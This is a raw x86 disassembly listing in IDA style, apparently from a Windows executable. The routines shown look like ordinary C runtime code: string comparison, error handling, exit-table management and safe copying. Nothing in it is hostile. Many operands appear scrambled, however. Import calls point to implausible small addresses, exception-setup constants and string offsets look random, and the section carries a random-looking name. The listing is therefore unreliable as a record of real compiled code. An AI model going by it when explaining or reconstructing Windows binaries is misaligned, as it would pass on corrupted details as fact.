mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40267A proc near ; CODE XREF: sub_401337+D�p
push 44h
mov edx, 205B85h
call sub_4045CC
push 182DC2h
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 0C16E1h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
int 3 ; Trap to Debugger
sub_40267A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4026B9 proc near ; CODE XREF: sub_401141+13�p
; sub_4012AC+F�p
push 44h
mov ebp, 650C16h
call sub_4045CC
push 32860Bh
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 194305h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D338
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D338
mov eax, esi
pop esi
retn 4
sub_4026B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402710 proc near ; CODE XREF: sub_401C1D+9A�p
; sub_401CC0+1B7�p ...
cmp ecx, ds:dword_423064
jnz short loc_40271A
rep retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_402710+6�j
jmp sub_40468E
sub_402710 endp
; =============== S U B R O U T I N E =======================================
sub_40271F proc near ; CODE XREF: sub_4027D6+D�p
; sub_4028F9+1A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 0
jnz short loc_402791
call sub_40539D
mov [esi+8], eax
mov ecx, [eax+6Ch]
mov [esi], ecx
mov ecx, [eax+68h]
mov [esi+4], ecx
mov ecx, [esi]
cmp ecx, ds:off_423678
jz short loc_40275D
mov ecx, ds:dword_423594
test [eax+70h], ecx
jnz short loc_40275D
call sub_4050B1
mov [esi], eax
loc_40275D: ; CODE XREF: sub_40271F+2A�j
; sub_40271F+35�j
mov eax, [esi+4]
cmp eax, ds:off_423498
jz short loc_40277E
mov eax, [esi+8]
mov ecx, ds:dword_423594
test [eax+70h], ecx
jnz short loc_40277E
call sub_4049A0
mov [esi+4], eax
loc_40277E: ; CODE XREF: sub_40271F+47�j
; sub_40271F+55�j
mov eax, [esi+8]
test byte ptr [eax+70h], 2
jnz short loc_40279B
or dword ptr [eax+70h], 2
mov byte ptr [esi+0Ch], 1
jmp short loc_40279B
; ---------------------------------------------------------------------------
loc_402791: ; CODE XREF: sub_40271F+D�j
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
loc_40279B: ; CODE XREF: sub_40271F+66�j
; sub_40271F+70�j
mov eax, esi
pop esi
retn 4
sub_40271F endp
; =============== S U B R O U T I N E =======================================
sub_4027A1 proc near ; CODE XREF: sub_4027D6+86�p
; sub_4028A9+39�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_4027AB: ; CODE XREF: sub_4027A1+2E�j
movzx eax, byte ptr [esi]
lea ecx, [eax-41h]
inc esi
cmp ecx, 19h
ja short loc_4027BA
add eax, 20h
loc_4027BA: ; CODE XREF: sub_4027A1+14�j
movzx ecx, byte ptr [edx]
lea edi, [ecx-41h]
inc edx
cmp edi, 19h
ja short loc_4027C9
add ecx, 20h
loc_4027C9: ; CODE XREF: sub_4027A1+23�j
test eax, eax
jz short loc_4027D1
cmp eax, ecx
jz short loc_4027AB
loc_4027D1: ; CODE XREF: sub_4027A1+2A�j
pop edi
sub eax, ecx
pop esi
retn
sub_4027A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027D6 proc near ; CODE XREF: sub_4028A9+45�p
; sub_40E79A+8F�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_10]
call sub_40271F
xor ebx, ebx
cmp [ebp+arg_0], ebx
jnz short loc_40281D
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402813
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402813: ; CODE XREF: sub_4027D6+34�j
mov eax, 7FFFFFFFh
jmp loc_4028A6
; ---------------------------------------------------------------------------
loc_40281D: ; CODE XREF: sub_4027D6+17�j
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
jnz short loc_402850
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402849
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402849: ; CODE XREF: sub_4027D6+6A�j
mov eax, 7FFFFFFFh
jmp short loc_4028A5
; ---------------------------------------------------------------------------
loc_402850: ; CODE XREF: sub_4027D6+4D�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_402865
push edi
push [ebp+arg_0]
call sub_4027A1
pop ecx
pop ecx
jmp short loc_402899
; ---------------------------------------------------------------------------
loc_402865: ; CODE XREF: sub_4027D6+80�j
push esi
loc_402866: ; CODE XREF: sub_4027D6+BC�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
cmp esi, ebx
jz short loc_402894
cmp esi, eax
jz short loc_402866
loc_402894: ; CODE XREF: sub_4027D6+B8�j
sub esi, eax
mov eax, esi
pop esi
loc_402899: ; CODE XREF: sub_4027D6+8D�j
cmp [ebp+var_4], bl
jz short loc_4028A5
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_4028A5: ; CODE XREF: sub_4027D6+78�j
; sub_4027D6+C6�j
pop edi
loc_4028A6: ; CODE XREF: sub_4027D6+42�j
pop ebx
leave
retn
sub_4027D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A9 proc near ; CODE XREF: sub_417676+34�p
; sub_417676+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp ds:dword_425DE0, esi
jnz short loc_4028E7
cmp [ebp+arg_0], esi
jnz short loc_4028DB
loc_4028BC: ; CODE XREF: sub_4028A9+35�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_4028F6
; ---------------------------------------------------------------------------
loc_4028DB: ; CODE XREF: sub_4028A9+11�j
cmp [ebp+arg_4], esi
jz short loc_4028BC
pop esi
pop ebp
jmp sub_4027A1
; ---------------------------------------------------------------------------
loc_4028E7: ; CODE XREF: sub_4028A9+C�j
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4027D6
add esp, 0Ch
loc_4028F6: ; CODE XREF: sub_4028A9+30�j
pop esi
pop ebp
retn
sub_4028A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028F9 proc near ; CODE XREF: sub_4029E9+51�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
jz loc_4029E2
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
cmp [ebp+arg_0], ebx
jnz short loc_40294B
loc_40291D: ; CODE XREF: sub_4028F9+57�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402941
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402941: ; CODE XREF: sub_4028F9+3F�j
mov eax, 7FFFFFFFh
jmp loc_4029E4
; ---------------------------------------------------------------------------
loc_40294B: ; CODE XREF: sub_4028F9+22�j
mov edi, [ebp+arg_4]
cmp edi, ebx
jz short loc_40291D
mov esi, 7FFFFFFFh
cmp [ebp+arg_8], esi
jbe short loc_402984
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402980
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402980: ; CODE XREF: sub_4028F9+7E�j
mov eax, esi
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_402984: ; CODE XREF: sub_4028F9+61�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_4029A9
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_405820
add esp, 0Ch
loc_40299B: ; CODE XREF: sub_4028F9+E7�j
cmp [ebp+var_4], bl
jz short loc_4029E4
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_4029A9: ; CODE XREF: sub_4028F9+91�j
; sub_4028F9+E1�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
dec [ebp+arg_8]
jz short loc_4029DC
cmp esi, ebx
jz short loc_4029DC
cmp esi, eax
jz short loc_4029A9
loc_4029DC: ; CODE XREF: sub_4028F9+D9�j
; sub_4028F9+DD�j
sub esi, eax
mov eax, esi
jmp short loc_40299B
; ---------------------------------------------------------------------------
loc_4029E2: ; CODE XREF: sub_4028F9+E�j
xor eax, eax
loc_4029E4: ; CODE XREF: sub_4028F9+4D�j
; sub_4028F9+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4028F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029E9 proc near ; CODE XREF: sub_419A9F+D3�p
; sub_419C6D+176�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp ds:dword_425DE0, esi
jnz short loc_402A30
cmp [ebp+arg_0], esi
jnz short loc_402A1B
loc_4029FC: ; CODE XREF: sub_4029E9+35�j
; sub_4029E9+3E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_402A42
; ---------------------------------------------------------------------------
loc_402A1B: ; CODE XREF: sub_4029E9+11�j
cmp [ebp+arg_4], esi
jz short loc_4029FC
cmp [ebp+arg_8], 7FFFFFFFh
ja short loc_4029FC
pop esi
pop ebp
jmp sub_405820
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_4029E9+C�j
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4028F9
add esp, 10h
loc_402A42: ; CODE XREF: sub_4029E9+30�j
pop esi
pop ebp
retn
sub_4029E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A45 proc near ; CODE XREF: sub_402D09+36�p
; sub_416F86+4C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push 4CA182h
call __SEH_prolog4
xor eax, eax
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
setnz al
cmp eax, edi
jnz short loc_402A7E
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402AD1
; ---------------------------------------------------------------------------
loc_402A7E: ; CODE XREF: sub_402A45+1A�j
cmp ds:dword_434DF4, 3
jnz short loc_402ABF
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_402AAB
mov esi, [ebx-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_402AAE
; ---------------------------------------------------------------------------
loc_402AAB: ; CODE XREF: sub_402A45+59�j
mov esi, [ebp+var_1C]
loc_402AAE: ; CODE XREF: sub_402A45+64�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402ADF
cmp [ebp+var_20], edi
jnz short loc_402ACF
loc_402ABF: ; CODE XREF: sub_402A45+40�j
push ebx
push edi
push ds:dword_425F68
call dword ptr ds:2650C1h
mov esi, eax
loc_402ACF: ; CODE XREF: sub_402A45+78�j
mov eax, esi
loc_402AD1: ; CODE XREF: sub_402A45+37�j
call __SEH_epilog4
retn
sub_402A45 endp
; =============== S U B R O U T I N E =======================================
sub_402AD7 proc near ; DATA XREF: .kSjx934:00421320�o
xor edi, edi
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_402AD7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402ADF proc near ; CODE XREF: sub_402A45+70�p
push 4
call sub_40591F
pop ecx
retn
sub_402ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AE8 proc near ; CODE XREF: sub_419EA0+54�p
jmp dword ptr ds:132860h
sub_402AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AEE proc near ; CODE XREF: sub_40177B+FE�p
; sub_40177B+12F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_402B19
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B98
; ---------------------------------------------------------------------------
loc_402B19: ; CODE XREF: sub_402AEE+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_402B45
cmp esi, ebx
jnz short loc_402B45
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B97
; ---------------------------------------------------------------------------
loc_402B45: ; CODE XREF: sub_402AEE+34�j
; sub_402AEE+38�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_402B54
mov [ebp+var_1C], ecx
loc_402B54: ; CODE XREF: sub_402AEE+61�j
push edi
lea eax, [ebp+arg_C]
push eax
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_402B96
dec [ebp+var_1C]
js short loc_402B88
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_402B94
; ---------------------------------------------------------------------------
loc_402B88: ; CODE XREF: sub_402AEE+91�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_402B94: ; CODE XREF: sub_402AEE+98�j
mov eax, edi
loc_402B96: ; CODE XREF: sub_402AEE+8C�j
pop edi
loc_402B97: ; CODE XREF: sub_402AEE+55�j
pop esi
loc_402B98: ; CODE XREF: sub_402AEE+29�j
pop ebx
leave
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B9B proc near ; CODE XREF: sub_416F86+15F�p
; sub_416F86+167�p ...
jmp sub_402F6D
sub_402B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BA0 proc near ; CODE XREF: sub_40101C+F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push esi
push edi
xor edi, edi
cmp eax, edi
jz short loc_402BF5
cmp [ebp+arg_0], edi
jnz short loc_402BCE
loc_402BB3: ; CODE XREF: sub_402BA0+31�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402BBD: ; CODE XREF: sub_402BA0+44�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402BF7
; ---------------------------------------------------------------------------
loc_402BCE: ; CODE XREF: sub_402BA0+11�j
cmp [ebp+arg_8], edi
jz short loc_402BB3
cmp [ebp+arg_4], eax
jnb short loc_402BE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402BBD
; ---------------------------------------------------------------------------
loc_402BE6: ; CODE XREF: sub_402BA0+36�j
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407370
add esp, 0Ch
loc_402BF5: ; CODE XREF: sub_402BA0+C�j
xor eax, eax
loc_402BF7: ; CODE XREF: sub_402BA0+2C�j
pop edi
pop esi
pop ebp
retn
sub_402BA0 endp
; =============== S U B R O U T I N E =======================================
sub_402BFB proc near ; CODE XREF: sub_401065+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_41D36C
retn
sub_402BFB endp
; =============== S U B R O U T I N E =======================================
sub_402C0C proc near ; CODE XREF: sub_4015ED+2F�p
; sub_40BA07+15D�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, ecx
mov dword ptr [edi], offset off_41D36C
mov eax, [ebx]
test eax, eax
jz short loc_402C47
push eax
call sub_404130
mov esi, eax
inc esi
push esi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [edi+4], eax
jz short loc_402C4B
push dword ptr [ebx]
push esi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402C4B
; ---------------------------------------------------------------------------
loc_402C47: ; CODE XREF: sub_402C0C+13�j
and dword ptr [edi+4], 0
loc_402C4B: ; CODE XREF: sub_402C0C+2B�j
; sub_402C0C+39�j
mov dword ptr [edi+8], 1
mov eax, edi
pop edi
pop esi
pop ebx
retn 4
sub_402C0C endp
; =============== S U B R O U T I N E =======================================
sub_402C5A proc near ; CODE XREF: sub_403032+A�p
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov dword ptr [eax], offset off_41D36C
mov ecx, [ecx]
and dword ptr [eax+8], 0
mov [eax+4], ecx
retn 8
sub_402C5A endp
; =============== S U B R O U T I N E =======================================
sub_402C72 proc near ; CODE XREF: sub_4013E6+15�p
; sub_4015ED+51�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D36C
mov eax, [ebx+8]
mov [esi+8], eax
test eax, eax
mov eax, [ebx+4]
push edi
jz short loc_402CBF
test eax, eax
jz short loc_402CB9
push eax
call sub_404130
mov edi, eax
inc edi
push edi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_402CC2
push dword ptr [ebx+4]
push edi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CB9: ; CODE XREF: sub_402C72+1E�j
and dword ptr [esi+4], 0
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CBF: ; CODE XREF: sub_402C72+1A�j
mov [esi+4], eax
loc_402CC2: ; CODE XREF: sub_402C72+36�j
; sub_402C72+45�j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn 4
sub_402C72 endp
; =============== S U B R O U T I N E =======================================
sub_402CCA proc near ; CODE XREF: sub_401038+6�j
; .kSjx934:0040104C�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41D36C
jz short locret_402CDF
push dword ptr [ecx+4]
call sub_403603
pop ecx
locret_402CDF: ; CODE XREF: sub_402CCA+A�j
retn
sub_402CCA endp
; =============== S U B R O U T I N E =======================================
sub_402CE0 proc near ; DATA XREF: .kSjx934:0041D318�o
; .kSjx934:0041D370�o ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_402CEC
mov eax, 0C41328h
locret_402CEC: ; CODE XREF: sub_402CE0+5�j
retn
sub_402CE0 endp
; ---------------------------------------------------------------------------
loc_402CED: ; DATA XREF: .kSjx934:off_41D36C�o
push esi
mov esi, ecx
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_402D03
push esi
call sub_402F6D
pop ecx
loc_402D03: ; CODE XREF: .kSjx934:00402CFA�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_402D09 proc near ; CODE XREF: sub_402DE5+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
push ds:dword_434DD0
call sub_405193
push ds:dword_434DCC
mov esi, eax
mov [esp+1Ch+var_4], esi
call sub_405193
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jb short loc_402DAE
mov ebx, edi
sub ebx, esi
lea ebp, [ebx+4]
cmp ebp, 4
jb short loc_402DAE
push esi
call sub_402A45
mov esi, eax
cmp esi, ebp
pop ecx
jnb short loc_402D95
mov ecx, 8F104Ch
cmp esi, eax
jnb short loc_402D56
mov eax, esi
loc_402D56: ; CODE XREF: sub_402D09+49�j
add eax, esi
cmp eax, esi
jb short loc_402D6C
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jnz short loc_402D83
loc_402D6C: ; CODE XREF: sub_402D09+51�j
lea eax, [esi+10h]
cmp eax, esi
jb short loc_402DAE
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jz short loc_402DAE
loc_402D83: ; CODE XREF: sub_402D09+61�j
sar ebx, 2
push eax
lea edi, [eax+ebx*4]
call sub_405127
pop ecx
mov ds:dword_434DD0, eax
loc_402D95: ; CODE XREF: sub_402D09+40�j
mov esi, [esp+14h+arg_0]
mov [edi], esi
add edi, 4
push edi
call sub_405127
mov ds:dword_434DCC, eax
pop ecx
mov eax, esi
jmp short loc_402DB0
; ---------------------------------------------------------------------------
loc_402DAE: ; CODE XREF: sub_402D09+27�j
; sub_402D09+33�j ...
xor eax, eax
loc_402DB0: ; CODE XREF: sub_402D09+A3�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_402D09 endp
; =============== S U B R O U T I N E =======================================
sub_402DB6 proc near ; DATA XREF: .kSjx934:0041D2C0�o
push esi
push 4
push 20h
call sub_40777A
mov esi, eax
push esi
call sub_405127
add esp, 0Ch
test esi, esi
mov ds:dword_434DD0, eax
mov ds:dword_434DCC, eax
jnz short loc_402DDE
push 18h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402DDE: ; CODE XREF: sub_402DB6+21�j
and dword ptr [esi], 0
xor eax, eax
pop esi
retn
sub_402DB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DE5 proc near ; CODE XREF: sub_402E21+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 4F8826h
call __SEH_prolog4
call sub_4078BC
and [ebp+ms_exc.disabled], 0
push [ebp+arg_0]
call sub_402D09
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402E1B
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_402DE5 endp
; =============== S U B R O U T I N E =======================================
sub_402E1B proc near ; CODE XREF: sub_402DE5+28�p
; DATA XREF: .kSjx934:00421340�o
call sub_4078C5
retn
sub_402E1B endp
; =============== S U B R O U T I N E =======================================
sub_402E21 proc near ; CODE XREF: sub_40304B+45�p
; sub_407979+44�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_402DE5
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_402E21 endp
; =============== S U B R O U T I N E =======================================
sub_402E33 proc near ; CODE XREF: sub_407B19+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_425A80, eax
retn
sub_402E33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_402E3D proc near ; CODE XREF: sub_402F39+1F�j
; sub_405A28+21�p ...
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
push esi
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
add esp, 0Ch
mov [ebp+2A8h+var_328], 0C000000Dh
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call dword ptr ds:27C413h
push 0
mov esi, eax
call dword ptr ds:13E209h
lea eax, [ebp+2A8h+var_2D8]
push eax
call dword ptr ds:9F104h
test eax, eax
jnz short loc_402F11
test esi, esi
jnz short loc_402F11
push 2
call sub_407B65
pop ecx
loc_402F11: ; CODE XREF: sub_402E3D+C6�j
; sub_402E3D+CA�j
push 0C000000Dh
call dword ptr ds:44F882h
push eax
call dword ptr ds:227C41h
mov ecx, [ebp+2A8h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2A8h
leave
retn
sub_402E3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F39 proc near ; CODE XREF: sub_4027D6+29�p
; sub_4027D6+5F�p ...
push ebp
mov ebp, esp
push ds:dword_425A80
call sub_405193
test eax, eax
pop ecx
jz short loc_402F4F
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_402F4F: ; CODE XREF: sub_402F39+11�j
push 2
call sub_407B65
pop ecx
pop ebp
jmp sub_402E3D
sub_402F39 endp
; =============== S U B R O U T I N E =======================================
sub_402F5D proc near ; CODE XREF: sub_40164F+5�p
; sub_40164F+14�p ...
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
retn
sub_402F5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402F6D proc near ; CODE XREF: .kSjx934:00401059�p
; .kSjx934:004010D5�p ...
jmp sub_403603
sub_402F6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F72 proc near ; CODE XREF: sub_401000+F�p
; sub_403B22+84�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_402F84
loc_402F80: ; CODE XREF: sub_402F72+4B�j
xor eax, eax
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402F84: ; CODE XREF: sub_402F72+C�j
cmp [ebp+arg_0], edi
jnz short loc_402FA4
loc_402F89: ; CODE XREF: sub_402F72+5F�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402F93: ; CODE XREF: sub_402F72+72�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402FA4: ; CODE XREF: sub_402F72+15�j
cmp [ebp+arg_8], edi
jz short loc_402FBF
cmp [ebp+arg_4], esi
